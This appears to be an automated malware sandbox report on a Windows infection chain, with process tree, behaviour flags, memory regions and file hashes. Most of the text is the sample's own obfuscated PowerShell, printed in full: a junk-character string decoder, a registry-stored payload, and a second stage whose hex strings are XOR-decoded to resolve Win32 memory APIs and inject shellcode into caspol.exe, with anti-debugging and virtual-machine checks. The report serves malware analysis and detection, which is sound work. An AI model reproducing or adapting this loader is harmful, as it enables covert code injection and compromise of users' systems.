Un`$NoEPrvDuaUtnKagsteAflUniVisuntBuaGerQuiTiuSamSc4Aa;De`$MaEThvInaUnnSagArestlKaiSesintRaaHirFoiReuOnmFo5Ur Al=Ge SlHSlTEmBPu Un'Te3Qu5St2Pa2Ma3ni3Am3Ki2Br3Ir5Gi2Ov9Ex6Ma7Zs6li3Cy0Ev0To2HaBOp2Un2Cy2Tr3An3Ho4Ry6De9Rh0Re4Ok3In5Pa2St2Sh2Rn6Uk3Go3Mo2Bi2Pr1Tr3Tr3MoETy3Sp7Tw2ak2Fu6YeFAr6SkETr'Fo;pe&Ud(An`$RoCSahSerPiicosBatSaiMoaScnDheve7zo)Sy Fu`$UnEAtvTraWanCogKieBolReiPrsHatDeaFlrBaiDouKomDa5Ko Pu Pl Ad;gr}ti`$IsgInrStnMatSteLytBe Co=An OdHSnTDvBCo Ov'Ov2FiCTo2Cy2Su3Am5Po2Pl9Oo2Fo2ma2IrBBi7No4Ac7Fl5Te'Br;St`$SuELivSuaFrnBrgMeeChlOpiSesKotSeaAlrGiiSauVemLo6Me Ar=Pe DiHUfTKoBCa Ef'Ru6Ti3Fe1Er3Un3Ag5Al2Ph6Pt2Be9Bl3Li4Re3St7In2Ps6Ta3An5Re2Ar2Fo2bo9un3Sm3sa2Il2Kv3Kh5Un6Ep7Ln7foADa6Ka7Un1LeCOv1Fo4Za3siEFo3sh4Fe3Ce3Ma2St2Pr2BeAFe6Vi9Ir1Cr5Ra3Ba2Ly2Sy9De3pr3Se2PaEPi2UrAGl2Ov2Re6Ge9Co0MiETh2La9Ge3Sc3Vo2Am2Sp3Un5Sc2Ca8Ly3St7Pa1So4Ci2Sk2Co3Se5Be3Sk1Un2PsESu2Sn4Vi2bi2He3Ma4Ur6Er9Su0BeAEn2Pu6Bt3Br5Zo3Ak4si2LoFBl2Kj6ki2TiBUl1ExAOr7RyDBa7EkDEf0Un0Ud2Br2Ab3Ya3br0Ob3Fr2Ci2Ch2IsBDi2Sl2Sl2Th0Ri2En6ac3Cl3Ko2Ty2In0Le1Ta2Di8Sk3Bo5Ma0Te1De3Gr2In2Sk9nd2Br4Re3Ej3Ta2LoEMu2Pr8Mo2Ga9Ki1Ek7Me2Di8Br2MiEbi2Ad9Ka3Sp3En2Hi2Pr3Ex5Cy6CaFTj6BaFAn2Po1Mi2MiCHy3Da7Ri6Of7Un6Pa3Ji2St0op3El5Ti2fo9St3Re3Fr2Ki2Re3br3En6Fa7Br6Be3Wi0Re4Fo2TrFHj3Hv5Ku2OvEab3Pi4An3Ha3Ku2ToECr2ci6Kl2Un9Fe2Af2Er7Be3Se6InEpi6PeBMa6La7Tr6SpFEf0Tu0rh0Sp3Si1mu3Na6Mi7Am0Ko7Tt6SaFOv1UnCSo0LeEUn2Pr9Di3Id3Pl1Ta7Fo3Di3Ti3Ku5Ba1PhANo6JoBIn6Un7bu1NoCpr1st2Un0MaEKo2nd9To3Fa3Op7Ha4Tj7Ja5He1MsABl6FrBRe6St7Ud1ArCre1Un2Ad0FlEAt2Al9Ko3Be3Tr7Mo4Sc7Ca5Al1TwAMa6UdBst6Un7Fi1FrCDa1No2Ri0maEUn2Le9St3Di3Ov7Fo4fr7Pe5Ka1ShAIn6EcEHe6Un7Em6OxFCa1AtCko0PrECo2Ba9No3Re3Ca1Hv7Sa3re3Tv3ga5De1LeAPl6CuETo6FeEPr6HaELa'Ne;re&Fe(Mi`$FoCBahMarRuiArsZytCoiMaaRhnHjehk7Hj)Ts Pr`$PjESivlbaPrnMigOxeKllHaiDosTetreaSkrAniDauDymSk6Mo;ex`$AkLOroBexProUndSaoUnnUdtHa Op=tu SufWikPopAf Lo`$udCArhSprHoiUisHvtEkiUnaNonKeeCo5Af fo`$thCPuhDyrsuitesprtIniQuaMenSteEu6Ve;Je`$UnEFovFoaAcnGagSoeWalPaiTisIstCeaKaraniKouBomSv7Pe St=Fe SnHArTBuBid Af'Sy6No3Ti2Sp2ra3Sm2Hn3So5st3FrEBi2Vo4Se2TrFTr2Kn8Kn3An5In2GoEKv2Fr4At7Op4Sy6Li7Ti7toAAr6Sl7Ne6Mi3Ps1Em3Fo3Ne5in2Pr6Ov2Le9Se3Rh4St3Sp7At2Ca6Re3Af5Jt2tr2Fo2Po9Tr3Un3Ba2Pr2Je3En5Li6Me9Pe0BeESy2In9Fi3An1Ba2Ba8As2TeCDe2Ex2In6UnFHj1SeCRi0TrECe2Je9Ai3Me3Ac1re7en3Mi3Ro3Ad5Uk1BrASl7SoDUn7HvDpo1ReDMo2Cm2La3Gy5Ba2Oo8El6PeBEf6Po7Ka7Pa1Sy7Br2Ti7Pr6Ai6TiBTo6Sp7Ac7No7Ge3InFCo7So4To7Fy7Ma7Va7Po7Mo7Cr6SaBBi6Ho7In7se7kn3ChFGl7Po3Be7Un7Cr6PrECe'Ha;Be&Fl(Bl`$arCCohCrrOpiPysNotApiEmaStnCieSl7Si)Us Pr`$PrEPbvKnaAbnOugOmeAdlChiHosMatDiaSnrKoiSeuCamVa7Vi;no`$ObESpvNiaAlnDigVieUdlCoiCosShtOpaEvrVaiUnuKomLa8Me Af=Er FoHDrTPiBPr Gl'Po6Mi3Ba0Xa9Be2Ud2Pr3In2Fo3Ka5An2At6Ba3Id4Ud3Ci3Ta2LeFSe2re2Gu2Hj9Io2AnEba2le4Ry3Dr4Kn6Fa7Pr7BrAFi6Ju7Ug6Pl3Am1Em3Fu3Li5Ac2Di6Un2Rm9Sy3Au4Pr3fe7Ni2Co6Mo3Sc5Ka2Sa2Re2Fo9De3Pa3Ha2Hy2sn3Fl5Da6Ru9St0PmESu2Di9su3Ha1Co2Sa8De2FoCVs2Ls2Me6SpFRe1SuCOr0TiECo2Ti9Vr3My3Sv1Ge7pr3Be3Gr3Ha5Mu1ReASv7StDSt7SrDAr1HyDKo2Bu2In3Lu5Fu2Pi8Pr6ReBPr6Pe7hv7Ud6Ca7Jo7gr7No7Ke7Bo2Tl7ToEPr7Fr0Hu7Di0An7Pr1Ka6ToBov6Ta7Sl7Pe7Pa3BoFZo7Ve4Pa7Fa7Be7Sp7Re7Ic7Ka6DiBCr6Ov7ma7Sw7Un3HaFSh7fi3Su6miEMi'Fe;St&Os(Dr`$NoCLehHorHaiSosUstHyiPlaUtnOaeFl7Tv)Ko Ka`$LiEInvTjaUsnChgPeeMelSpiNosMatSpaKvreniSauMamPr8Sw;Be`$GrAExzSsiRumUdiKonCooDybExeSenmazAsestnOmeUn=Ra(MiGBoeTatSl-NeIFutareCymOuPHarbloKopsteskrKatNeyHo ha-StPunaCetAnhCa Ex'OuHSkKBoCSkULi:Wh\StTAuoAgmmieSynIntCy\TufProPrrMuvdaiOmkMolFoiRenCegBeeTarPonPaean'Do)St.CaSLihBriPobOvbQuoGelFoeUdtShtHeeTurPanHleBysCo;De`$LiESkvHjastnSpgPheGelFoidosBatChaSkrSaiReuStmCo9Va Bo=Du UnHinTErBTh Ch'Pa6Ro3Do0Ma2Bl3Im1As2Ru6Re2Rh9Mi2Ha0Jd2Be2Ge2seBLu2NeENe3La4ta3et3Re2Su6Ob3pa5Ch2skEGu3Ge2Hy2MeADk6Ka7Go7FeAte6An7Ia1OoCNy1Ti4Ki3fiEMi3Di4Sl3ny3No2St2Ri2BaASn6Ha9Sm0Kl4Sl2Pa8Mo2sc9Sp3Ra1Un2Fa2Gn3Vi5Sc3no3Wi1ClAuk7CoDTi7ToDBo0Bo1Fr3Fu5Sa2ra8Sv2FlAEk0te5Ru2He6Bu3So4Sa2Ma2Kr7Bg1Ad7sp3Fo1Ca4Th3Co3Sa3Fo5Re2MiEVo2Al9Ot2Pe0Pe6RoFPo6No3Be0Is6En3MyDSa2QuEUn2TaAAm2DiERe2Fl9Na2Ra8sa2Sk5Kv2Pi2Ty2Ep9Dy3OpDTv2Pr2Co2Ko9Ge2No2Ga6UnESe'Un;Va&Fo(Fl`$OsCTuhSerFoiHasArtbriBuaTynSkeIs7Ve)Tu Pr`$TuEAdvLuaDinTigSeeUnlDoiNisRitudaScrHuiFruMamPa9Sk;ta`$TrASozMiiStmFoiSenHioCabTieDrnStzMaeAmnSieLi0Su Iz=Dr ChHUrTekBSc bi'Fy1foCLs1Eu4sh3KeELa3Te4Fr3Ga3Ko2Fo2Su2SuADi6Ca9Be1Ud5Sa3mi2Sy2Di9Fi3Vr3Cl2UdEUr2ByAGa2Wa2tr6Bo9Cr0KnEMo2Me9Hy3Sc3Fr2Si2Sc3Un5Sn2Fa8Su3Ce7Cr1Po4Gy2Ud2Be3Ar5Vi3Fe1lg2SkETe2Da4Ta2Lu2ov3ge4Br6no9Ru0OlASt2We6Di3Hy5Ce3Po4Ru2AbFIn2In6bo2UnBWo1GiATa7MyDOv7CaDAt0Ca4Sp2Ek8Sl3Ma7Re3CoEFr6CoFli6Se3am0Po2Ra3Ci1Ba2Ba6Fa2Da9He2In0Fr2Tr2fo2FlBAl2VeETi3As4To3Ca3Mo2Is6Am3Sn5Ko2WrEBr3se2op2FrAOr6HoBSh6Me7De7So7Ru6foBCh6Ut7La6Ho7Ma6De3ju2To2Pa3Ne2Pr3In5Rv3UnEJe2Ki4No2ReFCo2Ra8Ra3Mo5ho2BiEsl2Un4Tr7pl4sk6PaBLa6Ba7Dd7Sa1bo7In2Ec7zi6Sk6CoEva'Kr;Me&un(Co`$VeCGuhRarRiiVasaltOriAsaalnFoeCh7Sy)Pa Be`$FoAAezNaiTemEsiBanInoSebEleManRezNoePenAleAm0Fa;De`$NoIRanAddKasDjeSanUddSltSieOl=Sk`$KaEPovZeaStnMagUneDrlBeiSospotUnaPrrLaiSturemUn.VecTjoAruAdnSotMi-St6Ba5Pu1En;Co`$TrAElzSeiBlmExiSenFooMubBlePrnNozToeSlnStekn1Go Sv=Rk SeHAlTSaBDa As'In1GuCTi1Fu4na3CoEEf3Af4Ti3Te3Ko2In2Ha2HiAOv6Ma9Ol1ej5Ka3Tr2Ko2Cr9Ta3Up3Li2BiEhe2PeAEs2El2Se6Fo9Kl0CoEOr2Un9Lo3Fl3ni2gl2St3Fo5Ha2Im8Tu3Fu7Un1Fl4Gl2Vi2Fu3Di5Sa3Ar1do2ToEud2An4Yo2At2Bl3Po4Ta6In9Pr0DuAAi2su6st3Fd5Re3Ha4Ud2geFhe2Bu6Da2stBCo1DeAHu7IsDSk7ZuDmo0Ox4An2Is8Se3Ex7Un3DiESu6InFHv6Fa3Ku0st2Va3Ch1Ba2By6Pa2Sa9So2Yo0Dy2Su2De2NoBfl2LoELa3In4In3St3Ex2Pa6Sl3La5Fa2PhEUn3Da2Vi2TrATs6DeBGe6An7Be7Dr1No7Ch2Ey7Ea6Ho6TeBSa6Li7Wr6so3Sk0Mi9Br2Fo2Do3Ss2Tr3So5Sy2ac6Op3Du4Pu3Ne3Lu2PrFBr2So2Pi2Tr9Fl2ViEAn2te4Se3Av4Me6UrBEx6Ry7Su6Rd3Co0BaEEn2Al9An2Ri3Co3Sp4Sq2Se2De2An9Ra2Gy3Un3Bl3Fo2re2Be6PoESk'Gr;Pa&Ef(Us`$BiCHahRarBliDrsprtKuiSaaSpnHaeMe7Ri)Di cl`$UmAPrzaristmFliPrnDdoMibKnetrnLazPaeMenLieTh1St;Gu`$LsADizCoiUdmBriBandeoSobIneSpnZozUneHanUpeKo2To ty=Th KrHStTOfBSp Af'La6Fo3Ch1Ur4Do2OrCAn3As5Fg3en2Pa2Di2Sk3kr4Ud3Pr3Bl2ClEEu2huCam3Ut4Un6Ka7Li7prAMu6Ma7Fa1coCCr1Di4Fo3foEMy3Be4Ka3Sn3Pr2Re2Ko2CaAGr6Re9Un1Fo5Br3ov2Br2Ge9Ho3Li3Ma2IdEBr2jeACo2De2Ri6St9Du0ceENa2in9Ai3Ki3So2En2En3In5im2Xe8Cy3In7Br1Be4kl2Ta2Ar3Ti5ae3Ca1Bl2HeEHu2Ne4Sp2Sk2Su3En4Cr6Ke9In0NgAFr2Gr6Ja3Hi5Pu3Pr4Ze2saFTi2Rk6He2SkBPr1GlAFo7SmDMa7NaDFo0In0Em2Sh2Wa3Bo3St0Hu3Bu2Sk2Ek2PaBCo2Ka2Op2Un0At2He6Sa3Po3Qu2Mi2Sp0Te1Pl2Sa8Tr3St5Li0Mo1Ph3Ov2un2Ch9ga2Ax4Lu3Me3No2InEEn2St8Re2Af9Ro1lo7Ta2Tr8Fl2FaEMi2Aa9In3Un3Or2Ny2Sk3Se5Sl6TeFSn6PoFpr2Sk1Br2HaCFr3Ra7In6gu7Pe6Su3Da0Be4Co2Di6Ud2Sc5Sp2snELg2Ho9Sy2Cl2vi3Sh3Af3Pe0Pa2Fa8Sp3Su5Sh2RaCEk3Ov4Kr6Ga7Fo6Ho3Cy0Kl0Mo2Pa2Un2Lb9Tr2Po1Ka2Yn8Af3Re5si3Ar3Ch2IrBDr2KoBRe2Pr2Ud6AnECa6FeBIs6Be7An6UnFMa0Ar0sl0Il3Gu1Un3Sk6Pa7St0Un7Ov6CoFMa1MoCUp0alEvi2Re9Kr3Up3Mu1Me7Ko3Fo3Tr3cu5Au1FdADr6SmBPr6Do7No1BiCTe0LoEVi2Co9Yi3Di3Ps1Mo7Fo3Ns3Si3De5bo1NoAKy6GrBli6St7Li1HyCFr0ReEBu2An9Gr3Re3sm1Mo7Pe3Ti3Lo3Kr5An1MiASe6BoBFa6Ch7ba1MoCUn0CoESt2Ac9Kr3rg3Di1Pr7At3Sa3Mi3Sn5Pr1giASe6BeBFl6Gr7Af1SpCko0enEPs2Ci9Ne3No3Ve1Re7Me3Ak3Da3Sa5Fa1PoAUn6GoECo6Co7Gl6ReFFo1FoCsk0LaETi2St9El3Po3hj1Po7Fe3Te3In3su5vi1RaAFl6IvEst6frETe6TrEMa'Di;gg&Ex(Fe`$ShCPahNerDoiBasEltaciElaEvnSueBa7Se)Fr Ha`$SrACozGeiKkmmaiGunSpoTibReeVenHezUnePanWieSc2no;pi`$BeABuzSniSpmDeiSnnFooSobFreAmnLyzbaeThnCreFe3La Al=Po ReHBlTShBDa In'Se6Bo3Ba1Sk4Se2GeCBl3Eu5Pr3Pl2re2Sd2Le3Ku4Kl3Bi3Fr2SeEAs2GaCRu3Ka4Un6Al9Sg0AfETa2An9In3Da1Or2Sa8In2InCNe2Rh2St6OnFFr6Ta3to2Pr2El3de2De3Er5Ca3MuEEr2Ja4Tr2UmFDa2Fr8De3Li5An2DeEPu2Sp4Di7Fo4St6WhBSt6Or3Te0An9pl2Va2Li3Ga2Pu3An5kr2Ov6Tr3Zo4Fo3Ha3Uh2CaFJe2Lu2Sl2mi9Co2NoEMi2Bo4Ba3La4He6FaBFr6To3Tr0JuBOp2Lu8Pi3HoFFo2Do8Ja2Fi3Ca2Pe8Me2Un9Br3Fa3Sa6KoBHv7En7Sk6UdBNe7Kj7Os6InEPr'Br;Fl&Su(Se`$SrCCahUdrPaiRusUntRiiCaaHunSoeDa7Za)Re Ra`$PeALezOuiFumViiFanCooKrbKoeUdnPozCheKanReeHa3Vi#Un;""";Function Aziminobenzene9 { param([String]$Berthed); For($pharaohs=2; $pharaohs -lt $Berthed.Length-1; $pharaohs+=(2+1)){ $Raafrugts = $Raafrugts + $Tyrannophobia + $Berthed.Substring($pharaohs, 1); } $Raafrugts;}$Limpidity0 = Aziminobenzene9 'DiIBoEReXSu ';$Limpidity1= Aziminobenzene9 $pretincture;if([IntPtr]::size -eq 8){START-job { param($gagmen) powershell $gagmen } -RunAs32 -Argument $Limpidity1 | wait-job | Receive-Job;}else{&$Limpidity0 $Limpidity1;};;;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Berthed); $Skydedrs = $Berthed.Length; $Recommending = New-Object byte[] ($Skydedrs / 2); For($pharaohs=0; $pharaohs -lt $Berthed.Length; $pharaohs+=2){ $Recommending[$pharaohs/2] = [convert]::ToByte($Berthed.Substring($pharaohs, 2), 16); $Recommending[$pharaohs/2] = ($Recommending[$pharaohs/2] -bxor 71); } [String][System.Text.Encoding]::ASCII.GetString($Recommending);}$Noise1260=HTB '143E3433222A69232B2B';$Noise1261=HTB '0A2E2435283428213369102E297475691229342621220926332E31220A22332F282334';$Noise1262=HTB '0022331735282406232335223434';$Noise1263=HTB '143E3433222A69153229332E2A22690E293322352837142235312E242234690F2629232B22152221';$Noise1264=HTB '3433352E2920';$Noise1265=HTB '0022330A2823322B220F2629232B22';$Noise1266=HTB '1513143722242E262B09262A226B670F2E2322053E142E206B671732252B2E24';$Noise1267=HTB '153229332E2A226B670A262926202223';$Noise1268=HTB '1522212B222433222303222B2220263322';$Noise1269=HTB '0E290A222A28353E0A2823322B22';$Christiane0=HTB '0A3E03222B2220263322133E3722';$Christiane1=HTB '042B2634346B671732252B2E246B671422262B22236B670629342E042B2634346B6706323328042B263434';$Christiane2=HTB '0E2931282C22';$Christiane3=HTB '1732252B2E246B670F2E2322053E142E206B67092230142B28336B67112E353332262B';$Christiane4=HTB '112E353332262B062B2B2824';$Christiane5=HTB '2933232B2B';$Christiane6=HTB '093317352833222433112E353332262B0A222A28353E';$Christiane7=HTB '0E021F';$Christiane8=HTB '1B';$Cabinetworks=HTB '121402157475';$Genfortlle=HTB '04262B2B102E292328301735282406';function fkp {Param ($Tormentillen, $Robing) ;$Evangelistarium0 =HTB '63012B262A2A22342C3522337077677A676F1C06373703282A262E291A7D7D0432353522293303282A262E2969002233063434222A252B2E22346F6E673B67102F2235226A08252D222433673C67631869002B2825262B063434222A252B3E0426242F22676A062923676318690B282426332E28296914372B2E336F63042F352E34332E2629227F6E1C6A761A69023632262B346F6309282E3422767571776E673A6E69002233133E37226F6309282E3422767571766E';&($Christiane7) $Evangelistarium0;$Evangelistarium5 = HTB '63172626342C3E292322292322767573677A6763012B262A2A22342C3522337077690022330A22332F28236F6309282E3422767571756B671C133E37221C1A1A67076F6309282E3422767571746B676309282E3422767571736E6E';&($Christiane7) $Evangelistarium5;$Evangelistarium1 = HTB '3522333235296763172626342C3E292322292322767573690E2931282C226F6329322B2B6B67076F1C143E3433222A69153229332E2A22690E293322352837142235312E242234690F2629232B221522211A6F0922306A08252D22243367143E3433222A69153229332E2A22690E293322352837142235312E242234690F2629232B221522216F6F0922306A08252D222433670E29331733356E6B676F63012B262A2A22342C3522337077690022330A22332F28236F6309282E3422767571726E6E690E2931282C226F6329322B2B6B67076F631328352A2229332E2B2B22296E6E6E6E6B67631528252E29206E6E';&($Christiane7) $Evangelistarium1;}function GDT {Param ([Parameter(Position = 0)] [Type[]] $Opstilledes,[Parameter(Position = 1)] [Type] $insalubriously = [Void]);$Evangelistarium2 = HTB '63002B222334677A671C06373703282A262E291A7D7D0432353522293303282A262E29690322212E2922033E29262A2E24063434222A252B3E6F6F0922306A08252D22243367143E3433222A691522212B2224332E282969063434222A252B3E09262A226F6309282E34227675717F6E6E6B671C143E3433222A691522212B2224332E282969022A2E3369063434222A252B3E05322E2B2322350624242234341A7D7D1532296E690322212E2922033E29262A2E240A2823322B226F6309282E34227675717E6B676321262B34226E690322212E2922133E37226F63042F352E34332E262922776B6763042F352E34332E262922766B671C143E3433222A690A322B332E2426343303222B22202633221A6E';&($Christiane7) $Evangelistarium2;$Evangelistarium3 = HTB '63002B222334690322212E292204282934333532243328356F6309282E3422767571716B671C143E3433222A691522212B2224332E28296904262B2B2E2920042829312229332E2829341A7D7D14332629232635236B6763083734332E2B2B222322346E691422330E2A372B222A22293326332E2829012B2620346F6309282E3422767571706E';&($Christiane7) $Evangelistarium3;$Evangelistarium4 = HTB '63002B222334690322212E29220A22332F28236F63042F352E34332E262922756B6763042F352E34332E262922746B67632E2934262B3225352E2832342B3E6B6763083734332E2B2B222322346E691422330E2A372B222A22293326332E2829012B2620346F6309282E3422767571706E';&($Christiane7) $Evangelistarium4;$Evangelistarium5 = HTB '3522333235296763002B22233469043522263322133E37226F6E';&($Christiane7) $Evangelistarium5 ;}$grntet = HTB '2C223529222B7475';$Evangelistarium6 = HTB '6313352629343726352229332235677A671C143E3433222A69153229332E2A22690E293322352837142235312E242234690A2635342F262B1A7D7D00223303222B222026332201283501322924332E282917282E293322356F6F212C3767632035293322336763042F352E34332E262922736E6B676F00031367076F1C0E29331733351A6B671C120E293374751A6B671C120E293374751A6B671C120E293374751A6E676F1C0E29331733351A6E6E6E';&($Christiane7) $Evangelistarium6;$Loxodont = fkp $Christiane5 $Christiane6;$Evangelistarium7 = HTB '632232353E242F28352E2474677A676313352629343726352229332235690E2931282C226F1C0E29331733351A7D7D1D2235286B677172766B67773F747777776B67773F73776E';&($Christiane7) $Evangelistarium7;$Evangelistarium8 = HTB '63092232352634332F22292E2434677A676313352629343726352229332235690E2931282C226F1C0E29331733351A7D7D1D2235286B67767777727E7070716B67773F747777776B67773F736E';&($Christiane7) $Evangelistarium8;$Aziminobenzene=(Get-ItemProperty -Path 'HKCU:\Toment\forviklingerne').Shibboletternes;$Evangelistarium9 = HTB '630231262920222B2E343326352E322A677A671C143E3433222A69042829312235331A7D7D0135282A0526342271731433352E29206F63063D2E2A2E29282522293D2229226E';&($Christiane7) $Evangelistarium9;$Aziminobenzene0 = HTB '1C143E3433222A69153229332E2A22690E293322352837142235312E242234690A2635342F262B1A7D7D0428373E6F630231262920222B2E343326352E322A6B67776B6767632232353E242F28352E24746B677172766E';&($Christiane7) $Aziminobenzene0;$Indsendte=$Evangelistarium.count-651;$Aziminobenzene1 = HTB '1C143E3433222A69153229332E2A22690E293322352837142235312E242234690A2635342F262B1A7D7D0428373E6F630231262920222B2E343326352E322A6B677172766B6763092232352634332F22292E24346B67630E29233422292333226E';&($Christiane7) $Aziminobenzene1;$Aziminobenzene2 = HTB '63142C35322234332E2C34677A671C143E3433222A69153229332E2A22690E293322352837142235312E242234690A2635342F262B1A7D7D00223303222B222026332201283501322924332E282917282E293322356F6F212C3767630426252E2922333028352C346763002229212835332B2B226E6B676F00031367076F1C0E29331733351A6B671C0E29331733351A6B671C0E29331733351A6B671C0E29331733351A6B671C0E29331733351A6E676F1C0E29331733351A6E6E6E';&($Christiane7) $Aziminobenzene2;$Aziminobenzene3 = HTB '63142C35322234332E2C34690E2931282C226F632232353E242F28352E24746B63092232352634332F22292E24346B630B283F28232829336B776B776E';&($Christiane7) $Aziminobenzene3#"4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"5⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 24766⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4852 -ip 48521⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
57KB
MD56c73df1bb0c83bf158c1aebc058fbdd2
SHA1c3f64dbe2337cf4be331efaed86e600076d613cf
SHA2562bfd8c972f6bb05ae1adca5237a7210d569fb1f9662ad4dd6bfc4e00e88d17ba
SHA512a9093e7a6808cbe9aa86eb9eb1d50513e942800da5ffc9685c670a34d2349019caa65705dcd6e959de4b066673e3c45b64b5a94b7589c057817ec61eb65188e6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/1412-173-0x00007FFD8C280000-0x00007FFD8CD41000-memory.dmpFilesize
10.8MB
-
memory/1412-151-0x00007FFD8C280000-0x00007FFD8CD41000-memory.dmpFilesize
10.8MB
-
memory/1412-136-0x00007FFD8C280000-0x00007FFD8CD41000-memory.dmpFilesize
10.8MB
-
memory/1412-132-0x0000000000000000-mapping.dmp
-
memory/1412-135-0x0000020E5F360000-0x0000020E5F56A000-memory.dmpFilesize
2.0MB
-
memory/1412-133-0x0000020E5E1B0000-0x0000020E5E1D2000-memory.dmpFilesize
136KB
-
memory/1412-134-0x0000020E5EFD0000-0x0000020E5F146000-memory.dmpFilesize
1.5MB
-
memory/1452-138-0x0000000004E00000-0x0000000004E36000-memory.dmpFilesize
216KB
-
memory/1452-142-0x0000000005D90000-0x0000000005DF6000-memory.dmpFilesize
408KB
-
memory/1452-143-0x00000000064C0000-0x00000000064DE000-memory.dmpFilesize
120KB
-
memory/1452-141-0x0000000005C70000-0x0000000005CD6000-memory.dmpFilesize
408KB
-
memory/1452-145-0x00000000072A0000-0x000000000791A000-memory.dmpFilesize
6.5MB
-
memory/1452-146-0x0000000006A20000-0x0000000006A3A000-memory.dmpFilesize
104KB
-
memory/1452-140-0x0000000005B50000-0x0000000005B72000-memory.dmpFilesize
136KB
-
memory/1452-139-0x00000000054F0000-0x0000000005B18000-memory.dmpFilesize
6.2MB
-
memory/1452-137-0x0000000000000000-mapping.dmp
-
memory/2948-152-0x00007FFDAAB70000-0x00007FFDAAD65000-memory.dmpFilesize
2.0MB
-
memory/2948-167-0x0000000077B80000-0x0000000077D23000-memory.dmpFilesize
1.6MB
-
memory/2948-149-0x00000000089D0000-0x0000000008F74000-memory.dmpFilesize
5.6MB
-
memory/2948-153-0x0000000077B80000-0x0000000077D23000-memory.dmpFilesize
1.6MB
-
memory/2948-144-0x0000000000000000-mapping.dmp
-
memory/2948-155-0x0000000077B80000-0x0000000077D23000-memory.dmpFilesize
1.6MB
-
memory/2948-148-0x0000000007050000-0x0000000007072000-memory.dmpFilesize
136KB
-
memory/2948-150-0x0000000008030000-0x00000000089C8000-memory.dmpFilesize
9.6MB
-
memory/2948-158-0x0000000008030000-0x00000000089C8000-memory.dmpFilesize
9.6MB
-
memory/2948-166-0x0000000008030000-0x00000000089C8000-memory.dmpFilesize
9.6MB
-
memory/2948-147-0x0000000007330000-0x00000000073C6000-memory.dmpFilesize
600KB
-
memory/4852-161-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/4852-162-0x0000000000401000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/4852-164-0x0000000000400000-0x0000000000430000-memory.dmpFilesize
192KB
-
memory/4852-160-0x0000000077B80000-0x0000000077D23000-memory.dmpFilesize
1.6MB
-
memory/4852-159-0x00007FFDAAB70000-0x00007FFDAAD65000-memory.dmpFilesize
2.0MB
-
memory/4852-157-0x0000000001230000-0x0000000001BC8000-memory.dmpFilesize
9.6MB
-
memory/4852-168-0x0000000021330000-0x00000000213C2000-memory.dmpFilesize
584KB
-
memory/4852-169-0x00000000212C0000-0x00000000212CA000-memory.dmpFilesize
40KB
-
memory/4852-170-0x0000000001230000-0x0000000001BC8000-memory.dmpFilesize
9.6MB
-
memory/4852-171-0x00007FFDAAB70000-0x00007FFDAAD65000-memory.dmpFilesize
2.0MB
-
memory/4852-172-0x0000000077B80000-0x0000000077D23000-memory.dmpFilesize
1.6MB
-
memory/4852-154-0x0000000000000000-mapping.dmp